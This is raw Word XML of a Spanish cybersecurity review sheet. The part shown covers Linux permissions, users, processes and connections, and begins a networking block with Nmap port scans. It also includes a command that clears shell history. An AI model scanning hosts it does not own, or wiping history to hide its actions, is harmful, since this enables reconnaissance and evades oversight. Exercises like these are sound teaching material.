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27AE" w14:textId="1B21E8E7" w:rsidR="000944F3" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t>REPASO SEGURIDAD INFORMÁTICA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A38D8E" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562"/>
    <w:p w14:paraId="5D987BFA" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> BATERÍA DE 100 EJERCICIOS PRÁCTICOS DE CIBERSEGURIDAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD91816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🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 1: LINUX BÁSICO Y PERMISOS (1–20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DDDE8" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="1724182A">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B6E5E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1. Crear un usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9F6400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llamado alumno1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCC48F6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17F3F6" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo useradd alumno1</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>sudo passwd alumno1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F7021A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useradd crea el usuario y passwd le asigna contraseña.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F188233" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5EBFC199">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A47C7C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2. Crear grupo y asignar usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC8E52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el grupo seguridad y añade alumno1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0CEA28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67FCF34" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo groupadd seguridad</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>sudo usermod -aG seguridad alumno1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A26B29" w14:textId="01A41502" w:rsidR="00D607B1" w:rsidRPr="00206562" w:rsidRDefault="00D607B1" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EC6A27B" wp14:editId="7553F75D">
            <wp:extent cx="4476750" cy="2171700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="450288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8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F375" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explicación:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>-aG añade el usuario a un grupo sin eliminar otros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5482C1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="7D72E937">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E29093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3. Ver grupos de un usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375483AA" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>groups alumno1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B4D31A" w14:textId="21FEA372" w:rsidR="00D607B1" w:rsidRPr="00206562" w:rsidRDefault="00D607B1" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40D11E89" wp14:editId="318D4A9B">
            <wp:extent cx="2305050" cy="1133475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="982267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7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D937" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3C69CCA1">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D8DF42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4. Crear carpeta segura</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEABEE5" w14:textId="77777777" w:rsidR="001F2A7E" w:rsidRDefault="001F2A7E" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA64BE3" w14:textId="6BC1AA31" w:rsidR="001F2A7E" w:rsidRDefault="001F2A7E" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Antes tenemos que hacer lo siguiente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28690C82" w14:textId="77777777" w:rsidR="001F2A7E" w:rsidRDefault="001F2A7E" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D21DD99" w14:textId="4BF52DB1" w:rsidR="001F2A7E" w:rsidRDefault="001F2A7E" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747647C1" w14:textId="77777777" w:rsidR="001F2A7E" w:rsidRDefault="001F2A7E" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F2A7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sudo mkdir -p /home/alum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>no1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A885F81" w14:textId="77777777" w:rsidR="001F2A7E" w:rsidRDefault="001F2A7E" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60BBA6E1" w14:textId="48448F95" w:rsidR="001F2A7E" w:rsidRDefault="001F2A7E" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Si queremos cambiar el propietario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEF28B3" w14:textId="5447EDBB" w:rsidR="001F2A7E" w:rsidRDefault="001F2A7E" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
      <w:r w:rsidRPr="001F2A7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chown alumno1:alumno1 /home/alumno1/privado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B0B7BA" w14:textId="77777777" w:rsidR="001F2A7E" w:rsidRDefault="001F2A7E" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="761A8AA6" w14:textId="0CC4C470" w:rsidR="001F2A7E" w:rsidRPr="001F2A7E" w:rsidRDefault="001F2A7E" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>despues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F9BD5E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>mkdir /home/alumno1/privado</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>chmod 700 /home/alumno1/privado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E2A98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Solo el propietario puede acceder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8F3701" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="41DC1AD3">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="543DDE6E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5. Cambiar propietario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244D4D11" w14:textId="04359418" w:rsidR="001F2A7E" w:rsidRDefault="001F2A7E" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Crear con nano ese fichero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46358905" w14:textId="621A7E47" w:rsidR="00433121" w:rsidRDefault="00433121" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nano archivo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217538AB" w14:textId="77777777" w:rsidR="001F2A7E" w:rsidRPr="00206562" w:rsidRDefault="001F2A7E" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="648AFD39" w14:textId="58F66419" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo chown alumno1:</w:t>
      </w:r>
      <w:r w:rsidR="00433121" w:rsidRPr="00206562">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t>archivo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432156B0" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="33FDDE6E">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="710775C0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6. Permisos 755</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E449C" w14:textId="13D48612" w:rsidR="00433121" w:rsidRPr="00206562" w:rsidRDefault="00433121" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nano script.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463D4275" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>chmod 755 script.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372B5826" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E174E3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dueño: todo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284DDC18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grupo y otros: lectura + ejecución</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E013DF7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2D4AEA45">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B2FDE1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7. Permisos simbólicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D12FDED" w14:textId="4D5226D2" w:rsidR="00433121" w:rsidRPr="00206562" w:rsidRDefault="00433121" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nano archivo.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC26FB7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>chmod u+x archivo.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77448430" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2E0A1768">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9014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8. Copiar archivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247FD317" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>cp archivo.txt copia.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D1F105" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5430CF6A">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F183A96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9. Copiar carpeta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08927E11" w14:textId="6BF531FD" w:rsidR="00433121" w:rsidRDefault="00433121" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mkdir carpeta1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615058A0" w14:textId="72DB8996" w:rsidR="00433121" w:rsidRPr="00206562" w:rsidRDefault="00433121" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mkdir carpeta2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C6A4D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>cp -r carpeta1 carpeta2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D6F5B1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6F91FF27">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C92E4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10. Mover archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BC1DF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mv archivo.txt /tmp/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D5ED69" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4EF67FB7">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F01B1D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11. Eliminar archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10064F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>rm archivo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CEB493" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="618E75C2">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F26E3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>12. Buscar archivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477B869B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find / -name "passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E7B27C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="31486AFE">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB738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13. Ver procesos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF978F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E663BF8" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="423D721B">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0317459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14. Matar proceso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED5FABD" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>kill -9 PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6200FDAD" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4A4F5BDC">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B10BE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15. Ver conexiones activas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6CCAE0" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ss -tuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6487880E" w14:textId="5F7FA71F" w:rsidR="00A67489" w:rsidRPr="00206562" w:rsidRDefault="00A67489" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F3B2827" wp14:editId="1E0F0D56">
            <wp:extent cx="5400040" cy="836295"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="42566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6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BE4D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6183EFE5">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4524826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16. Alternativa netstat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AAF7D1" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>netstat -tuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACE643F" w14:textId="304213A1" w:rsidR="00A67489" w:rsidRPr="00206562" w:rsidRDefault="00A67489" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F7C3F4" wp14:editId="5A2DC89A">
            <wp:extent cx="5400040" cy="891540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="90650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DD53" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="1D971064">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C48F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17. Ver puertos abiertos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B5528A" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>lsof -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF4BE8D" w14:textId="2FE0F0A0" w:rsidR="00A67489" w:rsidRPr="00206562" w:rsidRDefault="00A67489" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="637C0A2E" wp14:editId="3EB6031F">
            <wp:extent cx="5400040" cy="1386205"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1663524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4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63E2" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="475C8AE5">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E00903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18. Ver usuarios conectados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A99A40" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>who</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538F3DEC" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4449405E">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39477B2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19. Historial de comandos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064D2B2B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597DBE7A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4937336F">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48012E7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20. Limpiar historial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705FF3B3" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>history -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1518E2" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="65BD08A2">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40685D8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🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 2: REDES Y ESCANEO (21–40)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED82209" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="20010A7E">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="449E9CF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21. Escaneo básico con Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F9A181" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB5948C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="62FC3CDE">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5310B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22. Escaneo de puertos específicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428A70FD" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -p 22,80,443 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541D6776" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="01B7FA3A">
